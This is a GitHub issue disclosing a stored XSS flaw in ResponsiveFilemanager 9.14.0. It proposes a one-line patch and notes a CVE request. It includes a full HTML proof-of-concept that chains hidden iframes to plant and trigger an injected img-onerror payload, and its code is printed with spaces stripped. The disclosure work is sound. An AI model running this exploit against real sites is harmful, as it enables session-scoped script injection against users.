You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
After taking another look at the ResponsiveFilemanager 9.14.0 i noticed that in the dialog.php file on line 197 that if the $_SESSION['RF']["view_type"] is already set that there would not be done any validation or would it take the data from the config. https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L197
This created a problem because in ajax_calls.php in the "view" action in the "type" parameter it is possible to set that value without any validation. https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/ajax_calls.php#L53
This means if you would first request a session by going to the dialog.php, than going to the ajax_calls.php and request the view action and as "type" parameter you give a html tag.
Than if you done al that go back to the dialog.php page than $_SESSION['RF']["view_type"] would be read and unescaped placed on all places where $view is used what created stored xss until the session isn't valid anymore.
A very simple patch would be to add fix_get_params() in the dialog.php on line 197 when the $view is set. https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L197
I made a simple html file you can use to validate this vulnerability.
It is made for Firefox because it does make use of iframe's and a clickjacking vulnerability but if the session was already set than this would also work in other browsers with a miner change.
you would need to change all "http://192.168.0.29:3001" to your website.
When runned it would make 3 iframe's.
One to request the dialog.php file to get a PHPSESSID and to set $_SESSION['RF']["verify"] as RESPONSIVEfilemanager.
Second it would open the ajax_calls.php to set the html tag.
And tirth it reopens the dialog.php page to trigger the stored xss
<!DOCTYPE html><html><head><script>varurl="http://192.168.0.29:3001";/** Execute the "view" action in ajax_calls.php and set as "type" a html tag.This will set $_SESSION['RF']["view_type"] on line 53 as my html tag.https://github.com/trippo/ResponsiveFilemanager/blob/428069746fabcef495b44d690bec20a05279a194/filemanager/ajax_calls.php#L53**/functioniframe1(){varifrm=document.createElement("iframe");ifrm.setAttribute("src",url+"/filemanager/ajax_calls.php?action=view&type=%22%3E%3Cimg/src=%27x%27/onerror=alert(document.domain)%3E","myWindow","width=200, height=100");ifrm.setAttribute("onload","iframe2();");ifrm.setAttribute("style","visibility: hidden;");ifrm.style.width="640px";ifrm.style.height="480px";document.body.appendChild(ifrm);}/** Go back to the dialog.php to trigger a xss starting at line 197 because when $_SESSION['RF']["view_type"] is already set and the view parameter isn't set than it would not take the data from the $config['default_view'] but uses the old data from $_SESSION['RF']["view_type"].And if view isn't set than it won't execute fix_get_params() what would prevented xss.because in ajax_calls.php this value wasn't sanitized with fix_get_params() when we setted the $_SESSION['RF']["view_type"] there is a stored xss until the session is expired.https://github.com/trippo/ResponsiveFilemanager/blob/428069746fabcef495b44d690bec20a05279a194/filemanager/dialog.php#L197https://github.com/trippo/ResponsiveFilemanager/blob/61f6b6d7d4ca2544afa55e358cb948951d6525f6/filemanager/include/utils.php#L675**/functioniframe2(){varifrm1=document.createElement("iframe");ifrm1.setAttribute("src",url+"/filemanager/dialog.php?type=0&lang=en_EN&popup=0&crossdomain=0&relative_url=0&akey=key&fldr=/","myWindow","width=200, height=100");ifrm1.setAttribute("style","visibility: hidden;");ifrm1.style.width="640px";ifrm1.style.height="480px";document.body.appendChild(ifrm1);}</script></head><body><!--create a iframe to the dialog webpage to receive a PHPSESSID and to set $_SESSION['RF']["verify"] as RESPONSIVEfilemanager.https://github.com/trippo/ResponsiveFilemanager/blob/428069746fabcef495b44d690bec20a05279a194/filemanager/dialog.php#L18if we would not do that this exploit would fail in ajax_calls.php on line 7.https://github.com/trippo/ResponsiveFilemanager/blob/428069746fabcef495b44d690bec20a05279a194/filemanager/ajax_calls.php#L7--><iframesrc="http://192.168.0.29:3001/filemanager/dialog.php?type=0&lang=en_EN&popup=0&crossdomain=0&relative_url=0&akey=key&fldr=/",width=200,height=100onload="iframe1();" style="visibility: hidden;" sandbox></body></html>
A CVE has been requested.
The text was updated successfully, but these errors were encountered:
After taking another look at the ResponsiveFilemanager 9.14.0 i noticed that in the dialog.php file on line 197 that if the $_SESSION['RF']["view_type"] is already set that there would not be done any validation or would it take the data from the config.
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L197
This created a problem because in ajax_calls.php in the "view" action in the "type" parameter it is possible to set that value without any validation.
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/ajax_calls.php#L53
This means if you would first request a session by going to the dialog.php, than going to the ajax_calls.php and request the view action and as "type" parameter you give a html tag.
Than if you done al that go back to the dialog.php page than $_SESSION['RF']["view_type"] would be read and unescaped placed on all places where $view is used what created stored xss until the session isn't valid anymore.
A very simple patch would be to add fix_get_params() in the dialog.php on line 197 when the $view is set.
https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L197
I made a simple html file you can use to validate this vulnerability.
It is made for Firefox because it does make use of iframe's and a clickjacking vulnerability but if the session was already set than this would also work in other browsers with a miner change.
you would need to change all "http://192.168.0.29:3001" to your website.
When runned it would make 3 iframe's.
One to request the dialog.php file to get a PHPSESSID and to set $_SESSION['RF']["verify"] as RESPONSIVEfilemanager.
Second it would open the ajax_calls.php to set the html tag.
And tirth it reopens the dialog.php page to trigger the stored xss
A CVE has been requested.
The text was updated successfully, but these errors were encountered: